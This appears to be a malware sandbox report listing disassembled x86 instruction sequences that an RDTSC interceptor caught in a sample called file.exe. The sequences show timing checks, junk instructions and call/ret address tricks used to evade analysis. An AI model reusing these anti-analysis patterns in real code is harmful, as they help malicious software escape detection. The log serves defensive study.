Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A111 second address: E6A115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E63B73 second address: E63B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A115 second address: E6A11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6BF6E second address: E6BF73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6BF73 second address: E6BFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F60F0BA1028h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sbb bh, FFFFFFC1h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F60F0BA1028h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov ebx, dword ptr [ebp+122D1895h] 0x00000047 push 00000000h 0x00000049 mov ebx, dword ptr [ebp+122D294Ch] 0x0000004f xchg eax, esi 0x00000050 push ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F60F0BA1036h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6CF6D second address: E6CF72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6CF72 second address: E6CFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F60F0BA1028h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edi, 56AD52E7h 0x00000027 cmc 0x00000028 push 00000000h 0x0000002a mov bx, si 0x0000002d mov di, E6A4h 0x00000031 push 00000000h 0x00000033 mov edi, 145AC298h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6CFB3 second address: E6CFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6CFBA second address: E6CFC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E701DE second address: E70260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F60F0C8AB58h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, dx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F60F0C8AB58h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 xor ebx, 47005B63h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F60F0C8AB58h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 xchg eax, esi 0x00000055 jmp 00007F60F0C8AB64h 0x0000005a push eax 0x0000005b push edi 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E721F4 second address: E721FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E721FE second address: E7224F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F60F0C8AB62h 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov dword ptr [ebp+122D1AEBh], esi 0x00000018 mov cl, 74h 0x0000001a popad 0x0000001b push 00000000h 0x0000001d and ebx, dword ptr [ebp+12450B0Ch] 0x00000023 push esi 0x00000024 mov ebx, 520E3AEEh 0x00000029 pop ebx 0x0000002a push eax 0x0000002b push eax 0x0000002c js 00007F60F0C8AB5Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E73176 second address: E73187 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E73187 second address: E7318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7318B second address: E73216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1032h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F60F0BA1028h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D2B28h] 0x0000002b jmp 00007F60F0BA1033h 0x00000030 mov dword ptr [ebp+122D1C7Fh], eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F60F0BA1028h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D2914h] 0x00000058 push 00000000h 0x0000005a mov ebx, dword ptr [ebp+122D2B04h] 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push edi 0x00000066 pop edi 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E73216 second address: E7321C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7418C second address: E741DE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F0BA1028h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F60F0BA1037h 0x00000012 mov edi, dword ptr [ebp+122D3368h] 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b mov edi, dword ptr [ebp+122D2994h] 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D38E5h], ecx 0x00000029 mov dword ptr [ebp+122D1C77h], esi 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 jns 00007F60F0BA102Ch 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E772F8 second address: E77382 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F60F0C8AB58h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D28E8h] 0x00000029 xor dword ptr [ebp+122D17BCh], esi 0x0000002f push 00000000h 0x00000031 sub ebx, 2E34058Bh 0x00000037 pushad 0x00000038 jmp 00007F60F0C8AB61h 0x0000003d mov edi, dword ptr [ebp+122D2828h] 0x00000043 popad 0x00000044 push 00000000h 0x00000046 cld 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 jmp 00007F60F0C8AB62h 0x0000004e jne 00007F60F0C8AB61h 0x00000054 popad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E77382 second address: E77387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E78332 second address: E78336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E78336 second address: E7833A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6B117 second address: E6B1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 jl 00007F60F0C8AB5Ch 0x0000000e jp 00007F60F0C8AB56h 0x00000014 jmp 00007F60F0C8AB68h 0x00000019 popad 0x0000001a nop 0x0000001b mov dword ptr [ebp+122D17C7h], esi 0x00000021 mov ebx, dword ptr [ebp+122D32E2h] 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cmc 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 sub dword ptr [ebp+12453C6Ch], edx 0x0000003c mov eax, dword ptr [ebp+122D16D1h] 0x00000042 cmc 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007F60F0C8AB58h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f mov di, 0A8Eh 0x00000063 nop 0x00000064 jmp 00007F60F0C8AB62h 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jno 00007F60F0C8AB5Ch 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E826E7 second address: E826EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E826EC second address: E82713 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F60F0C8AB62h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F60F0C8AB5Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E82713 second address: E82719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E82719 second address: E8271D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81EAF second address: E81EB9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81EB9 second address: E81ECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81ECF second address: E81ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81ED9 second address: E81EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F60F0C8AB56h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E82047 second address: E8204B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6D1CD second address: E6D1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8588E second address: E858A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F60F0BA102Ah 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E858A6 second address: E858AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E858AC second address: E858C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F60F0BA1034h 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F60F0BA1026h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E858C2 second address: E858D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7242B second address: E72434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E733F2 second address: E7345A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F60F0C8AB56h 0x00000009 jmp 00007F60F0C8AB66h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov dword ptr [ebp+122D3783h], eax 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov bx, 9B3Ah 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c adc ebx, 72CB36C1h 0x00000032 mov eax, dword ptr [ebp+122D16C1h] 0x00000038 mov edi, dword ptr [ebp+122D1F2Ch] 0x0000003e mov dword ptr [ebp+12450A20h], eax 0x00000044 push FFFFFFFFh 0x00000046 mov ebx, dword ptr [ebp+122D2B18h] 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 jnl 00007F60F0C8AB56h 0x00000056 pop edi 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7345A second address: E7345F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7345F second address: E7347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F60F0C8AB63h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7347E second address: E73499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1037h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7431B second address: E7431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7431F second address: E7433A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1037h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8DEE8 second address: E8DEF2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8DEF2 second address: E8DEFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F60F0BA1026h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D4C7 second address: E8D4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D620 second address: E8D639 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F60F0BA102Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D8F9 second address: E8D910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D910 second address: E8D914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8DD5F second address: E8DD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8DD68 second address: E8DD82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E94257 second address: E9425E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E92F74 second address: E92F96 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F0BA102Ch 0x00000008 jl 00007F60F0BA1026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F60F0BA1028h 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93263 second address: E93269 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93269 second address: E932AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F60F0BA1039h 0x0000000a jmp 00007F60F0BA1037h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F60F0BA1026h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93559 second address: E9355D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9355D second address: E93582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA1031h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F60F0BA1026h 0x00000013 jp 00007F60F0BA1026h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93582 second address: E93586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93586 second address: E935B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F60F0BA1026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F60F0BA1035h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 jnp 00007F60F0BA1026h 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E92CD5 second address: E92CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93986 second address: E9398C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93AFF second address: E93B09 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F0C8AB72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93C6A second address: E93CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA102Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F60F0BA1036h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 jnp 00007F60F0BA102Eh 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93F53 second address: E93FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F60F0C8AB69h 0x0000000a jno 00007F60F0C8AB58h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F60F0C8AB69h 0x00000017 pushad 0x00000018 jmp 00007F60F0C8AB68h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E93FAF second address: E93FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F60F12493A6h 0x00000012 jg 00007F60F12493A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E98B9F second address: E98BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9B872 second address: E9B87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA0147 second address: EA014B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA014B second address: EA0151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA0151 second address: EA0157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E27195 second address: E2719E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2719E second address: E271B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60F1137216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F60F113721Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E271B7 second address: E271BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E679CA second address: E67A4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F113721Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a js 00007F60F1137216h 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov cl, bl 0x00000017 jmp 00007F60F1137227h 0x0000001c lea eax, dword ptr [ebp+12489779h] 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007F60F1137218h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000019h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c and ecx, dword ptr [ebp+122D19C7h] 0x00000042 mov dh, bl 0x00000044 nop 0x00000045 push eax 0x00000046 push edx 0x00000047 push esi 0x00000048 jmp 00007F60F1137227h 0x0000004d pop esi 0x0000004e rdtsc
